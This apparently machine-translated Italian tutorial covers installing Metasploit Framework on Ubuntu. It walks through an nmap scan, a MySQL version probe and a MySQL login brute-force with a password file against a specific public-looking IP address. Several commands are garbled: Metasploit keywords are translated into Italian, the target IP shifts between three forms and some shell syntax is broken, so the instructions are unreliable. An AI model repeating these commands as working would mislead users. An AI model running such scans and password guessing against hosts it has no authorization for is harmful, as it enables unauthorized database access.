Sommario
Metasploit Framework, è un strumento per sviluppare ed eseguire exploit contro un computer o un server. Metasploit Framework è stato scritto in linguaggio Ruby, è multipiattaforma e richiede un computer potente per funzionare, esiste una versione a pagamento e una versione gratuita per la community.Può essere scaricato da www.metasploit.com/framework/download
Stiamo per installare in Linux Ubuntu, ma funziona per altre distro modificando alcuni comandi.
Accediamo alla finestra del terminale e installiamo ruby, prima che funzionasse con perl ma era programmato completamente nuovo.
Installiamo le dipendenze ruby in modo da poter poi eseguire il framework.
sudo apt-get install ruby libruby rdoc sudo apt-get install libyaml-ruby sudo apt-get install libzlib-ruby sudo apt-get install libopenssl-ruby sudo apt-get install libdl-ruby sudo apt-get install libreadline-ruby sudo apt -get install libiconv-ruby sudo apt-get install rubygems * sudo apt-get install libgtk2-ruby libglade2-ruby
Quindi a seconda della versione che scarichiamo a 32 o 64 bit dal termink daremo il permesso:
chmod + x metasploit-latest-linux-x64-installer.run
Eseguiamo il programma di installazione e si aprirà la finestra di installazione:
sudo metasploit-latest-linux-x64-installer.run
Al termine dell'installazione dalla finestra del terminale e con accesso root aggiorniamo il framework
con il comando:
msfupdate
Metasploit è un programma senza ambiente grafico che gira completamente nel terminale. Accediamo al software da terminale con il comando:
msfconsole
Conoscere MSF internamente
MSF (Metasploit Framework) È strutturato in una serie di moduli quali:
exploit Quali sono gli script e i programmi disponibili in MSF e che possiamo utilizzare, sono organizzati per sistema operativo e categorie, ad esempio exploit / windows / browser / quali sono gli exploit disponibili per i browser che girano su Windows.
Payload: È l'azione che verrà svolta se la vulnerabilità che stiamo testando può essere trovata e sfruttata.
Ausiliario: gli script ausiliari con funzioni diverse, come ausiliario/scanner/portscan/tcp e utilizzando questo scanner di porte tcp, otterremmo lo stato della porta. Questo script è un'alternativa a Nmap.
Encoder: Stanno codificando script per eludere alcuni antivirus e antispammer.
Iniziamo un esempio di test, da terminale eseguiamo:./msfconsole
Inizieremo scansionando un IP con nmap
msf> nmap -sV 190.155.80.110
Attiviamo il modulo ausiliario per accedere agli strumenti di script che permetteranno di lavorare su mysql. Possiamo anche vedere la versione del modulo.
msf> ausiliario (versione_mysql)> imposta RHOSTS 190.155.80.110 // imposta l'ip remoto msf> imposta RHOSTS 192.155.80.110 msf> ausiliario (versione_mysql)> esegui // controlla la versione di mysql
Se viene eseguito correttamente può restituire la versione di mysql:
[*] 190.155.80.110 esegue Mysql5.0
Un altro caso con il modulo di scansione e il tentativo di cambiare l'utente root di mysql:
msf> usa scanner / mysql / mysql_login msf> set USERNAME admin msf> set PASS_FILE /tmp/keys.lst // file di testo con possibili chiavi una sotto l'altra msf> exploit
Se funziona possiamo accedere a mysql:
mysql -h 1920,155,80,110 -u admin -pkey